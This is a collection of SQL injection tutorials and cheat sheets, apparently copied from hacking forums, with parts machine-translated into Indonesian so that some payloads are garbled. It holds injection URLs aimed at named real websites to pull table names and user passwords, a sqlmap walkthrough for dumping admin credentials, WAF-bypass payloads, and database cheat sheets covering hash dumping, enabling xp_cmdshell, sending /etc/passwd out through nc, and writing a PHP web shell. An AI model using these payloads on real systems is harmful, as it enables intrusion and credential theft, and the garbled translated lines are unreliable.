732packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2union+select+3)x+group+by + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 58,25), lantai (rand ( 0) * 2))) a) -
733===> Entri duplikat
734'Laints, acara, mengundang, bergabung, 1' untuk kunci
735'group_key'
736+ dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (column_name), 0x7e) + f rom + information_schema.columns di mana table_name = 0xHex_Table limit + 0,1), 1,25), floor (rand (0) * 2))) a) - x
737+ dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (nama pengguna, 0x3a, passwo rd), 0x7e) + dari + pengguna limit + 0,1), 1,25), lantai (rand (0) * 2))) a) -
738
739-h
740
741
742
743Hi everyone,Today I'll show you a SQLI TIP,
744get large data with one request using substr function. use 'limit' is slow,
745so im gonna teach you how to bypass the error 1242,"'subquery
746returns more than 1 row'".
747I) Using substr function
748==
749the subtr function is usually for blind
750injection,but we can use this for bypass the limit
751of group_concat and the error 1242.
752for example,
753
754Code:
755
756http://www.lermitagehotel.ee/?
757pageid=160 +and+(select+1+from
758+(select+count(*),concat((select
759(select+concat(concat(user_na
760me,0x3a,user_pass),0x7e))+from
761+users+limit+0,1),floor(rand
762(0)*2))x+from+informat
763ion_schema.tables+group+by+x)a)
764error 1242-
765
766Subquery returns more than 1 row.
767we can use substr like that
768
769Code:
770
771And(select 1 from(select count
772(*),concat(0x3a,(select substr
773(group_concat(column1,0x3a,column2),1,150)from table where table_schema like database()),0x3a,floor(rand(0)*2))xfrom information_schema.tables group by x)z)-- -
774
775so
776Code:
777
778http://www.lermitagehotel.ee/?
779pageid=160 And(select 1 from
780(select count(*),concat(0x3a,
781(select substr(group_concat
782(table_name),1,150)from
783information_schema.tables where
784table_schema like database
785()),0x3a,floor(rand(0)*2))x from
786information_schema.tables group
787by x)z)-- -
788and
789
790Quote: Duplicate entry
791':admin_topmenu,album_photos,albums,
792defaults,form_items,form_log,' for key
793'group_key'
794Incre substr(group_concat(table_name),1,150) ...
795substr(group_concat(table_name),30,150)... to
796get next
797--
798
799in mysql>5
800Code:
801or 1 group by concat_ws(0x3a,
802(select substr(group_concat
803(column),1,150)
804from table),floor(rand(0)*2))
805having min(0) or 1-- -
806--
807in mysql 5.1+
808Code:
809and updatexml(0,concat(0x3a,
810(select substr(group_concat
811(column),1,150)
812from table)),0)-- -
813--
814notice: sometimes query number 2 dosent
815work,so use the first one.
816Code:
817II) Using concat() and group_concat
818()
819==
820Code:
821and updatexml(0,concat(0x3a,
822(select concat(0x3a,group_concat
823(column))
824from table)),0)-- -
825only for extractvalue() / updatexml().
826
827enjoy
828
829~h
830
831
832HACK WEBSITE MENGGUNAKAN SQLMAP SQL INJECTION TOOLS FULL TUTORIAL
833
834bagaimana cara menggunakan sqlmap pada metode GET
835
836
837- fingerprinting
838
839pertama Anda harus memiliki situs web yang rentan untuk target, jika Anda memiliki target sekarang buka sqlmap dan ketik perintah ini
840./sqlmap.py -u "http://www.target.com/index.php?id=2"
841sqlmap akan mendeteksi rentan dari target Anda dan akan memberi tahu Anda apa jenis rentan dan apa tipe database. dan jika target Anda rentan, lanjutkan ke langkah berikutnya.
842
843
844- temukan nama database
845
846ketik perintah ini untuk mencari nama database
847./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
848pada langkah ini, sqlmap akan menemukan nama database target Anda, misalnya saya menggunakan "web_db" untuk nama database.
849
850
851- temukan nama tabel
852
853Setelah sqlmap menemukan nama databse waktunya untuk menemukan nama tabel. gunakan perintah ini untuk menemukan nama tabel
854./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --table
855di sana akan menunjukkan kepada Anda beberapa nama tabel di dalam database "web_db", ok misalnya saya menggunakan "tbl_admin" sebagai nama tabel.
856
857
858- temukan nama kolom
859
860waktunya untuk menemukan apa yang ada di dalam "tbl_admin" dari "web_db" dan kami menyebutnya kolom. untuk menemukan kolom ketik perintah ini
861./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
862ini akan menunjukkan daftar nama kolom, misalnya saya menemukan kolom "pengguna" dan "kata sandi".
863
864
865- buang
866
867perintah ini akan membuang data dari kolom, ketik perintah ini
868./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
869dan saya menemukan "user = admin" dan "password = adminpass". sekarang buka web dan temukan admin login.
870
871bagaimana cara menggunakan sqlmap pada metode POST
872
873
874caranya sama dengan metode GET, hanya saja Anda harus memasukkan data POST ke sqlmap. misalnya saya memiliki situs yang rentan pada jalur "login.php". data POST adalah "id = admin & pwd = kata sandi & kirim = login". bagaimana cara menemukan data POST? cukup gunakan "Live HTTPheaders" yang merupakan add ons firefox.
875
876
877- fingerprinting
878
879caranya yang sama dengan metode GET, ketikkan saja perintah ini
880./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login"
881
882- temukan nama database
883
884./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --dbs
885
886- temukan nama tabel
887
888./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db --table
889
890- temukan nama kolom
891
892./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db -T tbl_admin - kolom
893
894- buang
895
896./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
897
898
899termasuk cookie
900
901
902masih metode yang sama tetapi Anda hanya harus memasukkan cookie
903./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
904atau
905./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
906
907parameter khusus
908
909
910jika Anda memiliki parameter khusus untuk menyuntikkan Anda dapat mengetik "-p" seperti perintah ini
911./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin" -p "pwd"
912sqlmap akan menyuntikkan parameter "pwd". atau Anda dapat memberi bintang "*" ke parameter untuk disuntikkan, seperti ini
913./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = * kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
914
915penutup
916
917
918jika Anda pengguna windows, jangan gunakan "./" untuk menjalankannya pada cmd.
919
920Go To Download Software: http://sqlmap.org/
921
922when you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST...
923
924SQLi Waf Behaviours
925
926union select 1,2,3,4-- - [<---WAF
927
928/*!union*/ select 1,2,3,4-- - [<--- No WAF
929
930/*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
931
932/*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
933
934/*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
935
936/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
937
938/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
939
940/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
941
942/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
943
944/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
945
946/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
947
948~asero
949
950EXTRACTING USERNAME AND PASSWORD IN THE TABLE
951
952QUERY :
953
954(select (@x) from (select (@x:=0x00), (select (@x) from users where (@x) in (@x:=concat(@x,'<br>',username,' : ',password))))x)
955
956Here are the three methods which i know and mostly use to bypass [,] COMMA
9571) union select 1/*!,*/ 2/*!,*/3
9582) union select 1,CHAR(44), 2,CHAR(44),3,char(44)
9593)(select 1)a join (select 2)b join (select 3)c
960hOpe if you have concept of sql injection i don't think i have to give eXample
961But also leaving here one eXample
962www.vuln.com/events.php?id=-1 union select 1,2,3===>blockEd..
963now use
964Union select 1,CHAR(44), 2,CHAR(44),3,char(44)--
965~h
966
967Pengetahuan Sql Untuk pelajar :)
968-------------------------------------------------- ------
969---> Apa itu Sql Injection
970-------------------------------------------------- -------
971Injeksi SQL adalah teknik di mana pengguna jahat dapat menyuntikkan perintah SQL ke dalam pernyataan SQL, melalui input halaman web.
972Perintah SQL yang disuntikkan dapat mengubah pernyataan SQL dan membahayakan keamanan aplikasi web. Dan Juga Hancurkan basis data colonthree Anda
973-------------------------------------------------- -------
974---> Apa itu Information_schema?
975-------------------------------------------------- -------
976INFORMATION_SCHEMA adalah basis data informasi, tempat yang menyimpan informasi tentang semua basis data lain yang disimpan oleh server MySQL. Di dalam INFORMATION_SCHEMA ada beberapa tabel hanya-baca.
977Berikut ini adalah daftar masing-masing pandangan yang ada.
978INFORMATION_SCHEMA.CHECK_CONSTRAINTS
979INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
980INFORMATION_SCHEMA.COLUMN_PRIVILEGES
981INFORMATION_SCHEMA.COLUMNS
982INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
983INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
984INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
985INFORMATION_SCHEMA.DOMAINS
986INFORMATION_SCHEMA.KEY_COLUMN_USAGE
987INFORMATION_SCHEMA.PARAMETERS
988INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
989INFORMATION_SCHEMA.ROUTINE_COLUMNS
990INFORMATION_SCHEMA.ROUTINES
991INFORMATION_SCHEMA.SCHEMATA
992INFORMATION_SCHEMA.TABLE_CONSTRAINTS
993INFORMATION_SCHEMA.TABLE_PRIVILEGES
994INFORMATION_SCHEMA.TABLES
995INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
996INFORMATION_SCHEMA.VIEW_TABLE_USAGE
997INFORMATION_SCHEMA.VIEWS
998-------------------------------------------------- -----
999---> Apa Nilai Null?
1000-------------------------------------------------- -------
1001NULL SQL adalah istilah yang digunakan untuk merepresentasikan nilai yang hilang. Nilai NULL dalam tabel adalah nilai dalam bidang yang tampaknya kosong.
1002Bidang dengan nilai NULL adalah bidang tanpa nilai. Sangat penting untuk memahami bahwa nilai NULL berbeda dari nilai nol atau bidang yang berisi spasi.
1003---------------------------
1004
1005
1006MSSQL INJECTION CHEAT SHEET
1007
1008Version SELECT @@version
1009Comments SELECT 1 — comment
1010SELECT /*comment*/1
1011Current User SELECT user_name();
1012SELECT system_user;
1013SELECT user;
1014SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
1015List Users SELECT name FROM master..syslogins
1016List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
1017SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
1018SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
1019SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
1020Password Cracker MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
1021List Privileges – current privs on a particular object in 2005, 2008
1022SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database
1023SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server
1024SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table
1025SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);
1026–permissions on a user– current privs in 2005, 2008
1027SELECT is_srvrolemember(‘sysadmin’);
1028SELECT is_srvrolemember(‘dbcreator’);
1029SELECT is_srvrolemember(‘bulkadmin’);
1030SELECT is_srvrolemember(‘diskadmin’);
1031SELECT is_srvrolemember(‘processadmin’);
1032SELECT is_srvrolemember(‘serveradmin’);
1033SELECT is_srvrolemember(‘setupadmin’);
1034SELECT is_srvrolemember(‘securityadmin’);
1035– who has a particular priv? 2005, 2008
1036SELECT name FROM master..syslogins WHERE denylogin = 0;
1037SELECT name FROM master..syslogins WHERE hasaccess = 1;
1038SELECT name FROM master..syslogins WHERE isntname = 0;
1039SELECT name FROM master..syslogins WHERE isntgroup = 0;
1040SELECT name FROM master..syslogins WHERE sysadmin = 1;
1041SELECT name FROM master..syslogins WHERE securityadmin = 1;
1042SELECT name FROM master..syslogins WHERE serveradmin = 1;
1043SELECT name FROM master..syslogins WHERE setupadmin = 1;
1044SELECT name FROM master..syslogins WHERE processadmin = 1;
1045SELECT name FROM master..syslogins WHERE diskadmin = 1;
1046SELECT name FROM master..syslogins WHERE dbcreator = 1;
1047SELECT name FROM master..syslogins WHERE bulkadmin = 1;
1048List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
1049SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
1050SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005
1051Current Database SELECT DB_NAME()
1052List Databases SELECT name FROM master..sysdatabases;
1053SELECT DB_NAME(N); — for N = 0, 1, 2, …
1054List Columns SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
1055SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
1056List Tables SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
1057SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
1058SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
1059Find Tables From Column Name – NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
1060SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
1061Select Nth Row SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
1062Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
1063Bitwise AND SELECT 6 & 2 — returns 2
1064SELECT 6 & 1 — returns 0
1065ASCII Value -> Char SELECT char(0×41) — returns A
1066Char -> ASCII Value SELECT ascii(‘A’) – returns 65
1067Casting SELECT CAST(’1′ as int);
1068SELECT CAST(1 as char)
1069String Concatenation SELECT ‘A’ + ‘B’ – returns AB
1070If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
1071Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
1072Avoiding Quotes SELECT char(65)+char(66) — returns AB
1073Time Delay WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
1074Make DNS Requests declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails â€\’ + @host + ‘c$boot.iniâ€â€™); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist â€\’ + @host + ‘c$boot.iniâ€â€™); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
1075– Also check out theDNS tunnel feature of sqlninja
1076Command Execution EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
1077EXEC sp_configure ‘show advanced options’, 1; — priv
1078RECONFIGURE; — priv
1079EXEC sp_configure ‘xp_cmdshell’, 1; — priv
1080RECONFIGURE; — priv
1081Local File Access CREATE TABLE mydata (line varchar(8000));
1082BULK INSERT mydata FROM ‘c:boot.ini’;
1083DROP TABLE mydata;
1084Hostname, IP Address SELECT HOST_NAME()
1085Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv
1086Drop Users EXEC sp_droplogin ‘user’; — priv
1087Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
1088Location of DB files EXEC sp_helpdb master; –location of master.mdf
1089EXEC sp_helpdb pubs; –location of pubs.mdf
1090Default/System Databases northwind
1091model
1092msdb
1093pubs — not on sql server 2005
1094tempdb
1095
1096------------------------------------
1097
1098MYSQL INJECTION CHEAT SHEET
1099
1100Version SELECT @@version
1101Comments SELECT 1; #comment
1102SELECT /*comment*/1;
1103Current User SELECT user();
1104SELECT system_user();
1105List Users SELECT user FROM mysql.user; — priv
1106List Password Hashes SELECT host, user, password FROM mysql.user; — priv
1107Password Cracker John the Ripper will crack MySQL password hashes.
1108List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
1109List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
1110Current Database SELECT database()
1111List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
1112SELECT distinct(db) FROM mysql.db — priv
1113List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
1114List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
1115Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
1116Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
1117SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
1118Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
1119Bitwise AND SELECT 6 & 2; # returns 2
1120SELECT 6 & 1; # returns 0
1121ASCII Value -> Char SELECT char(65); # returns A
1122Char -> ASCII Value SELECT ascii(‘A’); # returns 65
1123Casting SELECT cast(’1′ AS unsigned integer);
1124SELECT cast(’123′ AS char);
1125String Concatenation SELECT CONCAT(‘A’,'B’); #returns AB
1126SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
1127If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
1128Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
1129Avoiding Quotes SELECT 0×414243; # returns ABC
1130Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
1131SELECT SLEEP(5); # >= 5.0.12
1132Make DNS Requests Impossible?
1133Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
1134Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
1135SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
1136Hostname, IP Address SELECT @@hostname;
1137Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
1138Delete Users DROP USER test1; — priv
1139Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv
1140Location of DB files SELECT @@datadir;
1141Default/System Databases information_schema (>= mysql 5.0)
1142mysql
1143
1144------------------------------------------
1145Postgres SQL Injection Cheat Sheet
1146Version SELECT version()
1147Comments SELECT 1; –comment
1148SELECT /*comment*/1;
1149Current User SELECT user;
1150SELECT current_user;
1151SELECT session_user;
1152SELECT usename FROM pg_user;
1153SELECT getpgusername();
1154List Users SELECT usename FROM pg_user
1155List Password Hashes SELECT usename, passwd FROM pg_shadow — priv
1156Password Cracker MDCrack can crack PostgreSQL’s MD5-based passwords.
1157List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
1158List DBA Accounts SELECT usename FROM pg_user WHERE usesuper IS TRUE
1159Current Database SELECT current_database()
1160List Databases SELECT datname FROM pg_database
1161List Columns SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)
1162List Tables SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,â€) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)
1163Find Tables From Column Name If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;
1164Select Nth Row SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
1165SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
1166Select Nth Char SELECT substr(‘abcd’, 3, 1); — returns c
1167Bitwise AND SELECT 6 & 2; — returns 2
1168SELECT 6 & 1; –returns 0
1169ASCII Value -> Char SELECT chr(65);
1170Char -> ASCII Value SELECT ascii(‘A’);
1171Casting SELECT CAST(1 as varchar);
1172SELECT CAST(’1′ as int);
1173String Concatenation SELECT ‘A’ || ‘B’; — returnsAB
1174If Statement IF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead.
1175Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A
1176Avoiding Quotes SELECT CHR(65)||CHR(66); — returns AB
1177Time Delay SELECT pg_sleep(10); — postgres 8.2+ only
1178CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken from here .
1179Make DNS Requests Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):
1180SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
1181Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.netâ€.
1182Command Execution CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user
1183Local File Access CREATE TABLE mydata(t text);
1184COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
1185…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
1186…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
1187DROP TABLE mytest mytest;Write to a file:
1188CREATE TABLE mytable (mycol text);
1189INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
1190COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user. Generally you won’t be able to write to the web root, but it’s always work a try.
1191– priv user can also read/write files by mapping libc functions
1192Hostname, IP Address SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
1193SELECT inet_server_port(); — returns db server IP address (or null if using local connection)
1194Create Users CREATE USER test1 PASSWORD ‘pass1′; — priv
1195CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time
1196Drop Users DROP USER test1; — priv
1197Make User DBA ALTER USER test1 CREATEUSER CREATEDB; — priv
1198Location of DB files SELECT current_setting(‘data_directory’); — priv
1199SELECT current_setting(‘hba_file’); — priv
1200Default/System Databases template0
1201template1
1202
1203-----------------------------------------------
1204ORACLE SQL INJECTION CHEAT SHEET
1205
1206Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
1207SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
1208SELECT version FROM v$instance;
1209Comments SELECT 1 FROM dual — comment
1210– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
1211Current User SELECT user FROM dual
1212List Users SELECT username FROM all_users ORDER BY username;
1213SELECT name FROM sys.user$; — priv
1214List Password Hashes SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked
1215SELECT name,spare4 FROM sys.user$ — priv, 11g
1216Password Cracker checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
1217List Privileges SELECT * FROM session_privs; — current privs
1218SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
1219SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
1220SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
1221List DBA Accounts SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
1222Current Database SELECT global_name FROM global_name;
1223SELECT name FROM v$database;
1224SELECT instance_name FROM v$instance;
1225SELECT SYS.DATABASE_NAME FROM DUAL;
1226List Databases SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
1227– Also query TNS listener for other databases. See tnscmd (services | status).
1228List Columns SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
1229SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
1230List Tables SELECT table_name FROM all_tables;
1231SELECT owner, table_name FROM all_tables;
1232Find Tables From Column Name SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
1233Select Nth Row SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
1234Select Nth Char SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
1235Bitwise AND SELECT bitand(6,2) FROM dual; — returns 2
1236SELECT bitand(6,1) FROM dual; — returns0
1237ASCII Value -> Char SELECT chr(65) FROM dual; — returns A
1238Char -> ASCII Value SELECT ascii(‘A’) FROM dual; — returns 65
1239Casting SELECT CAST(1 AS char) FROM dual;
1240SELECT CAST(’1′ AS int) FROM dual;
1241String Concatenation SELECT ‘A’ || ‘B’ FROM dual; — returns AB
1242If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
1243Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
1244SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
1245Avoiding Quotes SELECT chr(65) || chr(66) FROM dual; — returns AB
1246Time Delay BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
1247SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow
1248SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
1249SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
1250– Also see Heavy Queries to create a time delay
1251Make DNS Requests SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
1252SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
1253Command Execution Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. :-(
1254Local File Access UTL_FILE can sometimes be used. Check that the following is non-null:
1255SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
1256Hostname, IP Address SELECT UTL_INADDR.get_host_name FROM dual;
1257SELECT host_name FROM v$instance;
1258SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
